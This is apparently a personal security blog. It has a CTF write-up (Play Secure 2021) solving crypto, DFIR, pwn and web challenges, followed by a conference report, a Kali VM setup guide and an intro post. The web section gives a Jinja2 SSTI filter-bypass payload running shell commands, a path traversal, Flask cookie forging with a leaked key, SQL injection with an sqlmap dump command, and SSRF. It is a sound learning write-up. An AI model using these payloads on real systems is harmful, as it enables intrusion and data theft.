Play Secure Conference was an online event held from 25th to 28th March 2021. The event focused on gamification to learn things and had many great speakers on this topic. I had a good time attending some of the talks on their virtual conference platform Gather, which was a nice bit of a change from other virtual events. Next to a great conference with interesting content there was also a CTF, which this write up is about.

I managed to get a few solves, as you can see in the screenshot below mostly in categories I'm the most comfortable with, DFIR and Web challenges, but also took baby steps outside of my comfort zone and took on Crypto and an Exploitation (or pwn as they are also called) challenges.

With eight challenges solved I secured myself a spot just inside the top ten, a result that I can be happy with.

Crypto

Crypto 0x01

The challenge gives a hashes.txt file, containing an array of hashes. The first step I tried was throwing these in to CrackStation:

While it didn't crack many of the hashes, it did point me in the right direction to solve this puzzle. There is progression of one letter added for each next hash, indicating that a hash is:
plaintext of previous hash + one character

This makes cracking them rather trivial by writing a script to add one letter every time and check if it matches the hash in the array of hashes:

import hashlib
import string

hashes = ['32096c2e0eff33d844ee6d675407ace18289357d', 'adca1294358f0b5c66365bb19a06486a0ad3f0a5', '281310883bf7a5c9de7d31b7881e291213613491', '2706f11064c008dd6e6721bb2cceedf01329b960', 'cb2af52a3d324fe0e7402ee843e0ab6b1fb4d32e', 'c2d5577179610a3e272ac59e03e0c745edf0dba5', '5afce0dafe8a0a25aebf819f46ee7673886732e4', '7daeb2400f309b0f5d735238eec30961807125fc', '9de3ea131b4a841e9647b0b1296c011733f63ebc', '202608ac71a16c9b83c72a3f7e680973d9b69fa5', 'd77605bd9ae05b0a977fca19fe1de8ac8fc87c4b', 'a0cf411c45d73e44cc0f26b6bb2bd76bf0a6b95b', 'a2913cb30c4e94af02be621951f34d6fc28e1042', 'c156632c6f1e2db4709c15f34cb37605cb2c442d', 'e850277d7ec0eca297def6ae8e17108632fcd90f', '95a2b1aefd6fc349f0fda31f07c6d23cb8c4959b', '7bf26f48605a1f73d3a2aa7e06b39bbf05a54e8d', 'be022e6d43475909f3d3187921b9a3e54f1b20b5', '6652defa2f95eaece27fb40ee64b7dfafac83c86', '46616b3677a1ffe495696c376a4f91b8337c3375', 'd7e6243d698b9272ad64309a9eee5428b9bd324a', 'a1e1d343911a9953a22a89703e412877a66ab1ee', 'ad17de1128468188fbc7d583f72cc4b32245b041', 'a582ed5dae10004ba66364846cef6cc415e555d3', 'debba38167bbce4146d0082f45c79f3c1efa924b', 'f1d0bbf5e045c45869aaef111d5c55afe1e5d799', '8c74f5c86d527b2403c76f2d635ad649f4517a5e', 'd0ca474f225c2425100b259e39e2e065fa308ec8']

key = ''
for hash in hashes:
    for letter in (string.printable):
        sha1sum = hashlib.sha1(key.encode('utf-8') + letter.encode('utf-8'))
        if sha1sum.hexdigest() == hash:
            key = key + letter
            print('updated key: '+key)
            continue

The script has two loops, the outer looping over the hashes in the array, the inner looping over every printable ascii character. Adding the character to the so far known key, hashing the result as sha1 and comparing it to the next hash in the array, moving on and updating the key once it finds a match. Running this script gives us:

And the last hash cracked is the solution to this challenge.

DFIR

Backspace

As you can see the challenge gives us a AD1 file, the AD1 file type is primarily associated with Forensic Toolkit by Access Data. So lets open it up in FTK imager and inspect it:

We see a flag.txt and FileSlack, the Flag.txt contains:

hello i will tell you something , im in love with memory forensics but also filesystem is great , so here is you flag in AES  CBC mode : 052eeee19e6fc1043260d0e978b7ad0410154b9cb4e4f64bb3f171e3cba8cc38e4c86c86c8af7bc61e8526cad894d69f   with iv : 001122355D223344D66FF87a51d20d1 and the key !! ops i think i removed it from the file , any way you can find it i thing it was the last words of this file  aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

And inside the file slack we find:

dGhlIGtleSBpcyA6IDAwMTEyMjMzNDRBQTU1REQ2NkZGOEI3YTUxZDIwZDE=

The = at the end hints at Base64 encoding, so lets decode that with CyberChef:

Giving us the message:
the key is : 0011223344AA55DD66FF8B7a51d20d1

So know we know the flag is AES CBC mode encrypted, and we have the key and the IV needed to decrypt it, which we can again do using CyberChef:

And there we see the flag, bringing this challenge to an end.

Registry

The file contains a chall.vmem:

Running strings against things like this is always a good  first attempt:

strings chall.vmem | grep CTF

And as you can see that got us an answer quite fast.

Stream

So we get a pdf file with the flag hidden somewhere inside it.

To analyze a PDF like this, I looked at the following blogpost by Didier Stevens:

https://blog.didierstevens.com/2019/03/07/analyzing-a-phishing-pdf-with-objstm/

Using his pdf-parser python tool, I used the following command to extract from the PDF, decode the extracted content, and piping the output to grep and searching for the 'CTF' keyword a flag begins with.

python3 pdf-parser.py -c -O -f challenge.pdf | grep CTF
 b'CTFAE{Nice_yoU_kNow_h0w_to_an4ly5333_A_PDF}'

As you can see, the command neatly outputted the flag.

Exploitation

Point To The Stars

First step is to connect to the challenge using netcat:

nc exploitation.ps.ctf.ae 5454

Lets see what we get:

Alright, we input 'test' at the 'Enter your wish:' prompt, and not much seems to have changed. The application also tells us where the flag is stored, and where the pointer is currently pointing at. Lets see if we give it some awkward input, like 'a'*100:

As we can see we overwrote the pointer with 0x61, which is 'a'. Lets see where we stop overwriting the pointer, working back 10 'a's at a time (so sending 90 next).

At 70*'a' we see we no longer overwrote the pointer. Also noticing that the hex difference between the star pointer and the flag storage is \x50 every time, so lets see if we can modify the pointer by 50, by sending 70*'a'50:

And indeed, that modifies the pointer correctly and makes the application out its flag.

Web

Public Secrets

The obvious first step is going to visit the site:

We need to access the admin panel according to the challenge text, so lets browse to /admin:

Okay, so we're not admin. Taking the hint from the challenge text we'll need to modify our cookie and we'll be granted access to this admin directory. Our cookie looks like this:

Not something easily modified to just say admin=true or something like that.

Lets look a little bit further at the website, and see what we can learn. The source code of the index page has an interesting script:

<script>
		$('.nav-link').click(e => {
			$('.active').removeClass('active');
			$(e.currentTarget).addClass('active');
			fetch('/api/getResource?resource=' + $(e.currentTarget).attr('file'))
				.then(res => {
					return res.json();
				}).then(jsonRes => {
					if (jsonRes.content) {
						$('#content').empty();
						$('#content').append(jsonRes.content);
					} else {
						alert('An error has occurred.');
					}
				})
		});
	</script>

Using that API end point lets us grab the code of the app, so lets see whats going on under the hood by browsing to:
http://web.ps.ctf.ae:8881/api/getResource?resource=../main.py

And we see:

{"content":"import os\nfrom flask import Flask, render_template, jsonify, request, session\n\napp = Flask(__name__, template_folder='templates')\napp.secret_key = b'SuperSecretKey' # Probably should change this...\n\n@app.route('/', methods=['GET'])\ndef main():\n\tif 'type' not in session:\n\t\tsession['type'] = 'user'\n\treturn render_template('index.html')\n\n@app.route('/admin', methods=['GET'])\ndef admin():\n\tif 'type' not in session:\n\t\treturn 'Invalid session!'\n\telse:\n\t\tif session['type'] == 'admin':\n\t\t\treturn render_template('admin.html', initf=os.getenv('INITF'))\n\t\telse:\n\t\t\treturn 'You are not admin!'\n\n@app.route('/api/getResource', methods=['GET'])\ndef getResource():\n\tif request.args.get('resource'):\n\t\ttry:\n\t\t\tresource = request.args.get('resource')\n\t\t\tf = open(f'{os.getcwd()}/resources/{resource}', 'r')\n\t\t\tcontent = f.read()\n\t\t\tf.close()\n\t\t\treturn jsonify({\n\t\t\t\t'content': content\n\t\t\t})\n\t\texcept Exception as e:\n\t\t\tprint(str(e))\n\t\t\treturn jsonify({\n\t\t\t\t'error': str(e),\n\t\t\t\t'message': 'Error in main.py!'\n\t\t\t})\n\telse:\n\t\treturn jsonify({\n\t\t\t'error': 'Missing argument.'\n\t\t})"}

Standing out:

app.secret_key = b'SuperSecretKey' # Probably should change this

And the check for admin:

if session['type'] == 'admin'

So we now know the app's secret key, which is probably used to sign our cookie with. Doing a little more research finds the following blogpost.

https://blog.paradoxis.nl/defeating-flasks-session-management-65706ba9d3ce

Reading Luke (who is awesome btw) his blog post we find we can decode our existing cookie, and even create our own cookies using his script.

Decoding the cookie shows that the cookie contains 'type' : 'user'.  Using the flask-unsign tool with the secret_key that was found, its possible to create a cookie for ourselves with 'type': 'admin':

Changing our cookie in the browser and visiting the /admin page again gets us:

Welcome Card

Visiting the website we see:

After trying different types of input it turns out to be valuable to template injection, entering {{7*7}} gives:

So we see the expression got evaluated, some google as to how to abuse jinja template injection lands us at:

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#jinja2---basic-injection

With the filter bypass payload:

{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}

Entering this in to the website:

We see the 'id' command got executed. Now replacing the 'id' command for: find / -name flag.txt shows us the flag is in opt:

And changing the command again to "cat /opt/flag.txt" gets us a nice welcome card containing the flag:

Leaked Hosts

The site shows us:

Searching for a test user:

Alright, lets see if we can search for all users:

Gives us an sql error:

As we see the spaces got stripped, causing the error. But we can replace them for comments /**/:

And this gets us ALL the users:

Lets use SQL map to get the entire database:

sqlmap -u 'http://web.ps.ctf.ae:8883/getUsers?username=test' --tamper=space2comment --dump

And we find a very complex password:

Using these credentials we can use the file inclusion, we know we need to find a server only reachable from this one, so lets look at the hosts file:

The 172.22.0.2 looks interesting, lets use the URL fetching utility to look at that:

So lets grab that flag:

And success:

Closing

That concludes the write up for the few challenges I managed to solve. Had a lot of fun playing this CTF and picked up a few new tricks as well as dabbling in to Crypto and Exploitation challenges for the first time.

I want to thank everyone that made this possible, the teams behind CTF.AE, the Play Secure conference and all the volunteers and sponsors involved.

This past week I had the pleasure of helping out at Beercon2: The Rise of the Rookie, a virtual information security conference put on by The Beer Farmers. As the title suggest this conference was all about Rookie speakers, people new to giving presentations. The best introduction to this conference I can probably give you is this one minute hype video that was made.

Across two days, 29 speakers delivered 27 outstanding talks that would not have been out of place at some of the bigger name conferences. In this blog post I will talk about how I experienced this event, both helping out behind the scenes and as a first time speaker.

With a global pandemic making in person events near impossible some conferences have chosen to go virtual. Many more however have sadly decided to cancel all together, citing reasons such as 'nobody is waiting for more zoom meetings'. While more established speakers will probably still be asked to deliver their talks, the opportunities for first time speakers are drastically reduced. Beercon2 looked to do the exact opposite and give a platform to these first time speakers, and succeeded in doing so in marvelous fashion.

A big part of the aforementioned success was not simply giving the rookies a platform to speak, but also offering them guidance and coaching in delivering their first talk. This came in the form of a mentoring workshop, put on by more experienced speakers. In this workshop tips and tricks were given and any questions the speakers might have were answered. After this workshop all the mentors remained available to answer questions and help practicing talks in the mentoring channel on the Beercon2 Slack server. In this channel it was just mentors and speakers, even the organizers stepped back from it, creating a very safe environment without judgement to share any doubts or concerns a rookie speaker might have.  

This Slack server, and the mentoring channel in particular, was absolutely buzzing in the weeks leading up to the conference. People were clearly excited, tips were shared, and many speakers helped each other doing practice runs of their presentations. A true community and support system was forming, people helped each other with their talks, and I'm sure many lasting friendships were born.

Thursday morning it was finally time to kick off the conference, I found myself in the lobby of our zoom meeting to do audio/video/screen share checks with all the speakers ~20 minutes before they went on the virtual stage. Every. Single. One. showed up well in advance, fully prepared and excited. At other conferences I've volunteered at I have seen issues with getting speakers on stage in time, speakers disappearing when they were needed or showing up so late that sound checks came in jeopardy, not here. No ego, no arrogance, just passionate people excited to get to present. Getting speakers prepared and in the right place at the right time was the easiest job ever.

Friday, day two of the conference, was from a volunteering standpoint no different than day one and everything went off without a hitch. Once again everybody was lovely, and most importantly rocking their talks. The quality of all the talks was impressive, as someone on Twitter remarked "nobody tuning in would have known they were rookies".

This did however add to my nerves, as I was scheduled to speak at 18:00, as last talk of the event. Right before I went on friends and mentors gave me some encouraging words, reminded me to drink water and wished me luck. In the meeting with the hosts we had another quick 5 minute chat to get ready before we went live.

While I was nervous at the start this faded about  two sentences in and I just gave my presentation. Just like everybody said would happen. I feel it went well and am happy with it, and a river of positive feedback would suggest this feeling is justified. If you want to see my talk its available on YouTube.

After all the talks the hosts gave a short closing remark before we went on to the after party, a beer farmer hosted pub quiz over at InfosecHappyHour. It was a bit rowdy at times but that is to be expected from a pub, and the quiz was a hilarious closing to an amazing conference.

There is a twitter list with all the speakers in it that I can recommend you to follow because they are all equally amazing, and all the talks are available on YouTube.

BeerCon2

Geniet van je favoriete video’s en muziek, upload originele content en deel alles met vrienden, familie en anderen op YouTube.

YouTube

I had an absolute blast both helping out and speaking myself. So a massive thank you to the entire organization for making this possible, giving me and other rookies the chance to deliver our first talk.

The Beer Farmers:

• Mike Thompson
• Sean Wright
• Scott McGready
• Ian Thornton-Trump
• John Opdenakker

The Mentors:

• Claire Tills
• James Bore
• Sam Humphries
• Zoe Rose
• Dave McKenzie

And last but not least, my fellow roadie Gerard.

With the intention to showcase some of my work, and publish tutorials for people to follow along with on this blog I feel like it is important to have a certain baseline environment. In this post I will describe and document my environment this should enable people to create a similar setup for themselves as to avoid issues where examples I show don't work for others. As the title of this post says, this is my environment, configured how I like it. This is by no means the only, or the best way, but it is what works for me.

As I learn more, and new tools and software gets released its only natural that my toolbox and thus my environment keeps evolving. With this in mind I intend to keep this post up-to-date to reflect changes I make, so feel free to check back here once in awhile to see what is new.

As virtualization software I use VMWare Workstation Pro. But as a free alternative you can use VMWare Workstation Player, this free version is available for non-commercial, personal and home use and can be downloaded from: https://www.vmware.com/products/workstation-player.html.

My OS of choice is Kali Linux, a distribution aimed at security professionals. There are a few great alternatives, most notably Parrot OS. Personally I chose for Kali Linux as I'm most familiar with this distribution, but I encourage you all to experiment around with different options and find out what works for you. Next to the disc images (ISO files) to install Kali Linux with, Offensive Security has Virtual Machine versions available. I find that using these makes it fast and easy to get your environment up and running, they can be downloaded from here, as I'm using VMware I grab the Kali Linux VMware 64-Bit image, but images for Virtual Box and Hyper-V are also available if you chose for different virtualization software.

With your virtualization software of choice installed, and the appropriate image of Kali downloaded its time to make the machine, screenshots are taken from the VMware version that I use, but steps should not be to different with other software.

Creating the Virtual Machine

On the Home screen of VMware we need the option "Open a Virtual Machine":

Navigate to the folder where you've unpacked the archive containing the Kali Linux image, and select the vmx file and open it. You can assign more cores and/or memory to the VM in the "Virtual Machine settings" menu (shortcut CTRL+D), but in most cases the default settings should be fine, you can always change this later if you find the VM not running well enough.

The first thing I like to do is take a snap shot of the current state of the machine, so we can always easily revert back to here in case we make a mistake somewhere and something breaks. In fact, I often take snapshots before and after making major changes to my environment. To do this, open the snapshot manager by pressing CTRL+M or navigating to it through the menu " VM --> Snapshot --> Snapshot Manager".

Click the "Take Snapshot..." button and give your snapshot a name and a description so that you can remember what state the machine was in at this point. For the first snapshot I often chose "Fresh Install Kali $version" as a description, so in this case "Fresh install Kali 2020.2". That is all there's to it.

You can now start the machine by clicking the play button, the first time it starts you should get the following prompt:

Choose 'I Copied It'.

After the machine has finished booting up, you should be greeted by the Kali Linux login prompt.

In the past Kali Linux came with a root account by default, but recently this has changed and the default user is called kali, with as password kali. Enter these credentials and you should land on the desktop of your very own Kali Linux VM.

Bringing Kali up-to-date

Now we have a running Kali Linux machine, lets first bring her up to date. To do this open a terminal and run the following command.

sudo apt update && sudo apt dist-upgrade -y

Running this command will first prompt you for your password, as we are using sudo to run this command with elevated rights as an administrator, after you entered your credentials the system will start downloading the latest updates.

Configuring the correct timezone and keyboard layout

Chances are, especially if you are not from the United States, that the default VM Image does not have your correct timezone and/or keyboard layout, so lets fix that.

First for timezone, enter the following command in the terminal.

sudo dpkg-reconfigure tzdata

Again this command needs to be ran with elevated privileges so enter your sudo password, and follow the instructions on the screen.

Changing the keyboard layout works much the same, this time the command required is:

sudo dpkg-reconfigure keyboard-configuration

And again, follow the instructions on the screen to select the correct layout.

Change the default password and creating a new user

With the VM by default configured with kali/kali as username and password, it is advised to change this password, to do so type the passwd command in to the terminal.

passwd

After typing this command you will be asked for your current password, a new one, and once more to confirm this new password.

You can continue working as the kali user, now with a new password that not everyone knows, or you can choose to make your own user. If you want to create a new user follow these steps. First, create the user.

sudo adduser UserName

Replace UserName with your desired new username, this command will ask you for a new password for this user and a few other details, these other details you can leave blank. Now we have created the user and a home directory for this user.

As you have noticed before, we've quite often used the sudo command to run other commands with elevated privileges, to give our new user the rights to also use this command we need to add them to the sudo group.

sudo usermod -aG sudo UserName

Again, replace UserName with the name of your new user.

As a last step, we should change the default shell of our user to Bash, in order to do that run:

sudo chsh -s /bin/bash UserName

Finally we can now logout, and sign in as our new user.

Changing your SSH keys

Because the default image we used has the same SSH keys for everyone, an attacker could use this knowledge to perform Man in the Middle attack on your SSH session. Therefor it is advised to change these keys.

These keys we need to change are inside /etc/ssh, and all start with ssh_host_*

First I'd start by making a backup of these keys. To do this we will create a backup-keys directory inside the /etc/ssh directory and move all the files starting with ssh_host_ in to it.

sudo mkdir /etc/ssh/backup-keys && sudo mv /etc/ssh/ssh_host_* /etc/ssh/backup-keys

With the keys moved in to the backup directory we can create new keys.

sudo dpkg-reconfigure openssh-server

The output of this command should look something like this:

Now to confirm our new keys are different than the ones we just created, we can compare them to the keys in the backup folder, to do this we will take a MD5 sum of both sets of files.

As you can see, the computed checksum for all the files is different.

You now have a fully functional and up-to-date Kali Linux VM to use in a CTF or participate in various bug bounty programs with. Anything after this is installation of software I use and tweaking of configurations to suit my personal preferences. Non of it is mandatory or required but feel free to take from it what you feel might be useful.

Create a shared directory between host and VM

I like to have a shared folder between my host machine and the virtual machine where I keep most of the work I do in. This way if I spin up a new VM I still have all the work files readily available. To create a shared folder, open up the Virtual Machine Settings menu in VMware (CTRL+D), go to the options tab, select the 'Shared Folders' option and make sure 'Always Enabled' is checked. You can now pick which folder you want to share by clicking the Add button.

Try to avoid using spaces in your folder name, as Linux does not always play nice with this. Afterwards you can mount your shared folder with this command.

sudo mount -t fuse.vmhgfs-fuse .host:/ /mnt -o allow_other

If you want to automatically mount your shared folder on boot, you can add the following to the /etc/fstab file:

# Use shared folders between VMWare guest and host
.host:/    /mnt/hgfs/    fuse.vmhgfs-fuse    defaults,allow_other,uid=1000     0    0

Your shared folder should now be inside /mnt/hgfs/ everytime you start your virtual machine.

Install Atom

Atom is a hackable text editor, and it is my editor of choice to modify scripts or take notes in. You can read more about this tool over at their own website, https://atom.io/.

First we need to download Atom:

https://github.com/atom/atom/releases/download/v1.47.0/atom-amd64.deb

After downloading the file we can install it:

sudo dpkg -i atom-amd64.deb

After installing, you can start the program via the menu, or by typing the atom command inside your terminal.

Install tree, htop, nethog

sudo apt-get install -y tree htop nethogs

I like knowing what is going on on my system. These tools help me get insight in that.

• Tree gives a depth indented recursive listing of files and directories.
• Htop is an alternative to the default top and is used for real-time process monitoring.
• Nethogs can be used to view the network traffic to see which applications are using up your bandwidth.

Install FileZilla

If you are participating in a CTF chances are you will have to interact with an FTP server at some point. I know this can all be done from the terminal, but personally I prefer to have a graphical FTP program, and FileZilla is the one that I like most.

The command:

sudo apt-get install filezilla

Will install this application for you, just like Atom you can then start it from the menu, or by typing filezilla in to your terminal.

Install Jopin

Taking notes is extremely important. They help you writing your report for bug bounties, and they let you search back how you did something in the past if you encounter something that is very similar to something you have seen before.

My application of choice for taking notes is Joplin, you can install it with:

sudo apt-get install joplin

If you choose to use Joplin for taking notes like I do, I'd advice you to look in to how to configure syncing for it, and use the application on multiple of your devices.

Install Chrome

Kali comes default with FireFox as the web browser, personally I prefer Chrome while conducting tests against websites, so lets install that.

wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo apt install -y ./google-chrome-stable_current_amd64.deb

I add two addons to chrome, both can be downloaded in the chrome webstore:

• Foxy Proxy Standard, to quickly turn on/off a webproxy such as Burp Suite or OWASP ZAP
• Joplin Web Clipper, to capture and save things from the web in to my notes

Seclists

Word lists are super useful when brute forcing passwords, subdomains, or directories. A great collection of word lists is Seclists, you can read more about this project on the github page https://github.com/danielmiessler/SecLists/. On kali you can install it with the command:

sudo apt -y install seclists

Customizing your terminal

This will probably be different for everyone, there are many different terminal emulators to choose from, for example Guake or Terminator. Personally I use a combination of Terminator/ZSH/Oh-My-ZSH/P10K Theme.

Adding some fun

sudo apt-get install -Y cmatrix cowsay sl lolcat

This command will install:

• cmatrix
• cowsay
• sl (steam locomotive)
• lolcat

Non of these add any value to being productive, but they are fun when you find yourself giving a demo or just need a little something to cheer yourself up with.

Hello World,  

This is my first post on this blog. First I'll start with  a short introduction of myself before I get in to why I started this blog and what kind of content you can expect to see here.  

My name is Lennaert and I'm from Amsterdam, where I was born and raised. In my younger years I got in to video games and from there in to computers in general, and eventually developed an interest in hacking and cyber security. I study Digital Forensics at the University of Applied Science in Leiden.

This study exposes me to a lot of the digital forensics and incident response side of cyber security. I try to stay in touch with the more offensive ethical hacking side as a hobby by doing things like bug bounties, try hack me, and hack the box. I also try to practice Responsible/Coordinated vulnerability disclosure whenever I find a vulnerable system in the wild. Trying to balance these things I hope to form a good all-round perspective of the cyber security world.

Since 2018 I've volunteered for Hack In The Box Amsterdam, a cool security conference taking place in my home town. I also volunteer as a security researcher for the DIVD, the Dutch Institute for Vulnerability Disclosure.

In my spare time I like to play the occasional video game, and when I'm not behind a computer I enjoy cooking or riding my bicycle. Time with friends will be generally spent in a bar, or at home playing board games.

I feel that's enough about me, so on to why I started this blog and what kind of content you can expect here.

My main reason to start blogging is to document my journey of learning. I will be using this space to share my thoughts and ideas on subjects when I feel it's appropriate to do so. Next to that I hope to show case some projects that I've been working on once they reach the stage that I feel confident enough in them to do so.

Another thing I might write about are bug bounties and/or responsible disclosures, but only if they provide something that I feel is unique or make for a good story. Of course, I will only share these things once the issues involved are resolved, or I feel I have given the involved parties enough time to resolve them.

Write-ups of vulnerable machines / HTB / TryHackMe are something else I often see on people's blogs, currently I'm not sure how many of those I will be posting, simply because I feel others often have already published a more eloquent write up than I possibly could. If I find something unique about a machine or learned something special I will probably write a bit about it.

I hope this first post gave you a little insight in who I am and what you can expect from this blog, and I hope to see you check back here at some point!